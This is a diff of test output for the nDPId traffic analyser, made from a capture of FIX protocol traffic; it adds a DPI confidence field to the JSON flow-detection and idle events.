 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1493755110328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1493755110328,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0b9ZAAEAG7AHAqAAUCBEWH5\/WD6D+vKsbjSdUdYAQ\/\/\/knQAAAQEICtZGrHjKvirJ"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1493755110362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1493755110362,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAouAtAAEAGhg\/AqAAU0PVrA5b8D6BaeT6XM03fnFAQ\/GxkGwAAAAAAAAAA"}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1493755111422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1493755111422,"pkt":"THK5MeMlACJNe\/gxCABFAABwiaEAAPUGXPoIERYfwKgAFA+gn9aNJ1R1\/ryrG4AY\/\/+zfAAAAQEICsq+Lw\/WRqx4OD1PATk9MDA0OQEzNT1HAQFQAAAADVkI5OEMFgYg3VCIUAATiYF3AAAADFkI5OEMB9wg3RAAEAATiYAA"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1493755111956,"pkt":"THK5MeMlACJNe\/gxCABFAABP7\/wAADIGm\/fQ9WsDwKgAFA+glvYLJrChYuT9OVAYYmg1SgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
-00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755111956,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755111956,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPOZAAEAGATXAqAAU0PVrA5b2D6Bi5P05CyawyFAQ\/Gz0DgAAAAAAAAAA"}
 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1493755111956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"ts_msec":1493755111956,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9POdAAEAGAN\/AqAAU0PVrA5b2D6Bi5P05CyawyFAY\/GyQmgAAOD1GSVhDT01QATk9NzABeJwFwTEKgEAMBEDyII\/dJIu5g7SCP7C1sbPx\/4Uz1cd5jRy02UDKQg2LbFAVafJ2cIfgG+dSraCR3s\/9vUY05fYD3SIN0A=="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1493755113353,"pkt":"THK5MeMlACJNe\/gxCABFAABP8tQAADIGmR\/Q9WsDwKgAFA+gmLZKUJEYQJIHD1AYWpQ0OgAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
-00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755113353,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755113353,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1493755113353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1493755113353,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB8GO1AAEAGJNrAqAAU0PVrA5i2D6BAkgcPSlCRP1AY\/\/\/ZrgAAOD1GSVhDT01QATk9NjkBeJwFwTsKgEAQA1ByICWZnbAfmFbwBrY2djbev\/C9Ucd57bkLs8g0motoWZR7Co4KqtOMTXN5rBaQop77eyGWTPzcug3M"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1493755113404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1493755113404,"pkt":"THK5MeMlACJNe\/gxCABFAAAo8tUAADIGmUXQ9WsDwKgAFA+gmLZKUJE\/QJIHY1AQWpSMrwAA"}
 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1493755114507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"ts_msec":1493755114507,"pkt":"ACJNe\/gxTHK5MeMlCABFAACB4B9AAEAGe2vAqAAUCBEWH7tQD6DrumPmnOhHQIAY\/+BrUwAAAQEICrFzuwzKvibGOD1GSVhDT01QATk9NjIBeJwNx8ENwDAIA0B5oEYGQxMi8Y3UDbr\/JO39bvV53hHDUE3qhrIJxZ+smkhvp00m\/bLaubYEYzOED2YPC2I="}
 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1493755115297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":135,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":135,"pkt_l4_len":101,"ts_msec":1493755115297,"pkt":"THK5MeMlACJNe\/gxCABFAAB5U\/0AADIGN83Q9WsDwKgAFA+glvwzTd+cWnk+l1AYb976PQAAOD1PATk9MDA3MAEzNT1HAQH4AAAABVkI5OYMFeFg3lAEMAATioF3AAAABFkI5OYMFVZgnhAAEAATiYAAAAAABlkI5OYMW+2AXhAAEAQTiIAA"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1493755116662,"pkt":"THK5MeMlACJNe\/gxCABFAABP0h0AAC8GyO7ZwFYgwKgAFA+g0FJoqda4F+2kj1AYRRhFXQAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
-00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755116662,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755116662,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1493755116662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"ts_msec":1493755116662,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB9Lt9AAEAGGv\/AqAAU2cBWINBSD6AX7aSPaKnW31AYhgAmIwAAOD1GSVhDT01QATk9NzABeJwFwTsKgEAMBFByIJeZJMN+IK2wN7C1sbPx\/oXvjTr31bLRZgEpCxUsskD1SJOXgx2CH5xLY4WM9Hru7zWiKNkP3UcN1g=="}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1493755116788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1493755116788,"pkt":"THK5MeMlACJNe\/gxCABFAAAo0h4AAC8GyRTZwFYgwKgAFA+g0FJoqdbfF+2k5FAQRRid0QAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1493755117668,"pkt":"THK5MeMlACJNe\/gxCABFAABb6MoAAPUG\/eUIERYfwKgAFA+gn+AbjTX8bvFE4oAY\/\/8xhAAAAQEICsq+R3VyD9Q7OD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
-00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755117668,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"ts_msec":1493755117668,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1493755117668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"ts_msec":1493755117668,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK1yxAAEAGhFXAqAAUCBEWH5\/gD6Bu8UTiG402I4AY\/+CkEwAAAQEICnIP3\/PKvkd1OD1GSVhDT01QATk9NzEBeJwFwbENgDAMBEB5IKJ\/Ow5OpG+R2ICWho6G\/QvuSsd5td5oU0BPixQsusCsLEuXgzsSvnGurBXDSNdzf68R4gj7Ad5tDd0="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1493755117687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1493755117687,"pkt":"THK5MeMlACJNe\/gxCABFAAA09L8AAPUG8hcIERYfwKgAFA+gn+AbjTYjbvFFOIAQ\/\/9+KwAAAQEICsq+R4lyD9\/z"}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1493755117668,"flow_last_seen":1493755127687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":41,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755116662,"flow_last_seen":1493755126832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"217.192.86.32","dst_ip":"192.168.0.20","src_port":4000,"dst_port":53330,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":222,"flow_first_seen":1493755109242,"flow_last_seen":1493755131889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":9909,"flow_avg_l4_payload_len":44,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109301,"flow_last_seen":1493755128771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":40,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755109654,"flow_last_seen":1493755129718,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":37,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":401,"flow_first_seen":1493755109264,"flow_last_seen":1493755132120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":8240,"flow_avg_l4_payload_len":20,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1493755111956,"flow_last_seen":1493755132007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":37,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1493755110320,"flow_last_seen":1493755130355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":647,"flow_avg_l4_payload_len":35,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":38652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1493755113353,"flow_last_seen":1493755123449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":36,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":39094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"FIX","breed":"Safe","category":"RPC"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":456,"flow_first_seen":1493755109301,"flow_last_seen":1493755132102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":14279,"flow_avg_l4_payload_len":31,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1493755109440,"flow_last_seen":1493755131870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
+00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1261,"source":"fix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1493755110328,"flow_last_seen":1493755132019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":920,"flow_avg_l4_payload_len":25,"midstream":1,"ts_msec":1493755132120,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":40918,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
